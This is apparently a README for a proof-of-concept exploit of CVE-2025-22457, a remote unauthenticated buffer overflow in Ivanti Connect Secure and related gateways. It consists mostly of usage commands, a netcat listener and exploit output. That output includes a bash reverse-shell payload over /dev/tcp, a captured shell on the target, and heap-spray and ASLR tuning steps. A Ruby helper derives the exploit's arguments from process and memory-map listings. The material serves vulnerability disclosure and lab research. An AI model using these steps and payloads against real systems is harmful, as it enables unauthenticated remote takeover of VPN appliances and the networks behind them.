Source: https://sploitus.com/exploit?id=89582FE3-BE9E-5F53-9CA5-231D50587370
# PoC for CVE-2025-22457
_A remote unauthenticated stack based buffer overflow affecting Ivanti Connect Secure, Pulse Connect Secure, Ivanti Policy Secure, and ZTA Gateways_

## Overview

This is a proof of concept exploit to demonstrate exploitation of CVE-2025-22457. For a complete technical analysis of the vulnerability and exploitation strategy, please see our Rapid7 Analysis here: 

https://attackerkb.com/topics/0ybGQIkHzR/cve-2025-22457/rapid7-analysis

## Usage

We can run this script against a vulnerable Ivanti Connect Secure target, version 22.7r2.4, as follows:

Start a netcat listener to catch the reverse shell.

```console
C:\>ncat -lnvkp 8080
```

Run the exploit and brute force ASLR (this will be slow).

```console
C:\>ruby CVE-2025-22457.rb -t 192.168.86.111 -p 443 --lhost 192.168.86.35 --lport 8080
[2025-04-10 16:21:13 +0100] [+] Targeting https://192.168.86.111:443/
[2025-04-10 16:21:13 +0100] [+] Payload: bash -i >& /dev/tcp/192.168.86.35/8080 0>&1
[2025-04-10 16:21:13 +0100] [+] Detected version 22.7.2.3597
[2025-04-10 16:21:13 +0100] [+] Starting...
[2025-04-10 16:21:13 +0100] [+] Attempt 0, trying libdsplibs.so @ 0xf64ca000
[2025-04-10 16:21:13 +0100]     Making connections...
[2025-04-10 16:21:18 +0100]     Spraying...
[2025-04-10 16:22:27 +0100]     Triggering..
```

When it works, you will get a reverse shell.

```console
C:\>ncat -lnvkp 8080
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::8080
Ncat: Listening on 0.0.0.0:8080
Ncat: Connection from 192.168.86.111.
Ncat: Connection from 192.168.86.111:20746.
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.2$ id
id
uid=104(nr) gid=104(nr) groups=104(nr)
bash-4.2$ uname -a
uname -a
Linux localhost2 4.17.00.35-selinux-jailing-production #1 SMP Tue Jun 18 16:25:33 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
bash-4.2$
```

## Debug

### Web Child Processes

Depending on the underlying hardware, the number of CPUs available to the target appliance dictates the number of child processes the `/home/bin/web` binary will spawn. As all incoming HTTPS requests are distributed evenly between these children, we need to account for this and perform the heap spray enough times to cover every child process. This is necessary because, when we trigger the vulnerability, we cannot know which child process will handle the triggering request, so the heap spray must be present in every child process.

* 1 vCPU - 1 web process, no children
* 2 vCPU - 1 web parent, 2 children
* 4 vCPU - 1 web parent, 4 children (This is the default, and corresponds to the Ivanti Connect Secure ISA4000-V platform)
* 8 vCPU - 1 web parent, 8 children (This corresponds to the Ivanti Connect Secure ISA6000-V platform)

For example, in a rooted vulnerable appliance, run the following to see the number of child `/home/bin/web` processes:

```console
bash-4.2# ps -Al | grep web
ps -Al | grep web
4 S   104  3012  2394  0  80   0 - 26313 -      ?        00:00:00 web
4 S   104  3013  2394  0  80   0 - 24931 -      ?        00:00:00 web80
1 S   104  4947  3012  2  80   0 - 28209 -      ?        00:01:27 web
1 S   104  5217  3012  1  80   0 - 31527 -      ?        00:00:49 web
1 S   104  5695  3012  0  80   0 - 28199 -      ?        00:00:00 web
1 S   104  5715  3012  0  80   0 - 28199 -      ?        00:00:00 web
bash-4.2#
```

You can specify the expected number of web children via the `--web_children` argument, for example:

```console
C:\>ruby CVE-2025-22457.rb -t 192.168.86.111 -p 443 --lhost 192.168.86.35 --lport 8080 --web_children 4
```

### libdsplibs Base Address

If you are testing the PoC on a local system, you may want to avoid brute-forcing the `libdsplibs` base address. In this scenario, you can pass a known base address to the PoC via the `--libdsplibs` argument. For example, in a rooted vulnerable appliance, run the following:

```console
bash-4.2# ps -A| grep web
ps -A| grep web
 3200 ?        00:00:01 web80
20536 ?        00:00:02 web
bash-4.2# cat /proc/20536/maps | grep libdsplibs
cat /proc/20536/maps | grep libdsplibs
f642e000-f7994000 r-xp 00000000 fc:02 171879                             /home/lib/libdsplibs.so
f7994000-f7995000 ---p 01566000 fc:02 171879                             /home/lib/libdsplibs.so
f7995000-f79aa000 r--p 01566000 fc:02 171879                             /home/lib/libdsplibs.so
f79aa000-f79e3000 rw-p 0157b000 fc:02 171879                             /home/lib/libdsplibs.so
bash-4.2#
```

Then you can pass the known base address to the PoC as follows:

```console
C:\>ruby CVE-2025-22457.rb -t 192.168.86.111 -p 443 --lhost 192.168.86.35 --lport 8080 --web_children 4 --libdsplibs 0xf642e000
[2025-04-10 16:21:13 +0100] [+] Targeting https://192.168.86.111:443/
[2025-04-10 16:21:13 +0100] [+] Payload: bash -i >& /dev/tcp/192.168.86.35/8080 0>&1
[2025-04-10 16:21:13 +0100] [+] Detected version 22.7.2.3597
[2025-04-10 16:21:13 +0100] [+] Starting...
[2025-04-10 16:21:13 +0100] [+] Attempt 0, trying libdsplibs.so @ 0xf642e000
[2025-04-10 16:21:13 +0100]     Making connections...
[2025-04-10 16:21:18 +0100]     Spraying...
[2025-04-10 16:22:27 +0100]     Triggering...
```
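As an added example, not part of the Rapid7 PoC, the following Ruby (the PoC's own language) parses the `ps -Al` and `/proc/<pid>/maps` listings from the two Debug sections above to recover the values that the `--web_children` and `--libdsplibs` arguments expect; the sample listings are constructed from the README output, and `parse_ps`, `count_web_children`, `library_base` and `poc_arguments` are names chosen here.

```ruby
# Added example (not the PoC's code): derive --web_children and --libdsplibs
# from listings captured on a rooted lab appliance. Samples are constructed.
# `ps -Al` columns: F S UID PID PPID C PRI NI ADDR SZ WCHAN TTY TIME CMD
PS_SAMPLE = <<~PS
  4 S   104  3012  2394  0  80   0 - 26313 -      ?        00:00:00 web
  4 S   104  3013  2394  0  80   0 - 24931 -      ?        00:00:00 web80
  1 S   104  4947  3012  2  80   0 - 28209 -      ?        00:01:27 web
  1 S   104  5217  3012  1  80   0 - 31527 -      ?        00:00:49 web
  1 S   104  5695  3012  0  80   0 - 28199 -      ?        00:00:00 web
  1 S   104  5715  3012  0  80   0 - 28199 -      ?        00:00:00 web
PS

MAPS_SAMPLE = <<~MAPS
  f642e000-f7994000 r-xp 00000000 fc:02 171879   /home/lib/libdsplibs.so
  f7994000-f7995000 ---p 01566000 fc:02 171879   /home/lib/libdsplibs.so
  f7995000-f79aa000 r--p 01566000 fc:02 171879   /home/lib/libdsplibs.so
  f79aa000-f79e3000 rw-p 0157b000 fc:02 171879   /home/lib/libdsplibs.so
  f79e3000-f79f0000 rw-p 00000000 00:00 0
MAPS

# Parse `ps -Al` rows into pid/ppid/cmd; header and echoed command lines are skipped.
def parse_ps(ps_output)
  ps_output.lines.filter_map do |line|
    f = line.split
    next unless f.size >= 14 && f[3].match?(/\A\d+\z/)
    { pid: f[3].to_i, ppid: f[4].to_i, cmd: f[13] }
  end
end

# Children are processes named exactly "web" whose parent is itself a "web"
# process; the separate "web80" listener is ignored.
def count_web_children(ps_output)
  procs = parse_ps(ps_output).select { |p| p[:cmd] == 'web' }
  web_pids = procs.map { |p| p[:pid] }
  procs.count { |p| web_pids.include?(p[:ppid]) }
end

# Base address = lowest start address among the library's mappings (nil if absent).
def library_base(maps_output, name = 'libdsplibs.so')
  maps_output.lines.filter_map do |line|
    range, _perms, _offset, _dev, _inode, path = line.split(nil, 6)
    next unless path && File.basename(path.strip) == name
    range.split('-').first.to_i(16)
  end.min
end

# Render both values in the form the PoC's command line shown above takes.
def poc_arguments(ps_output, maps_output)
  format('--web_children %d --libdsplibs 0x%08x',
         count_web_children(ps_output), library_base(maps_output))
end
```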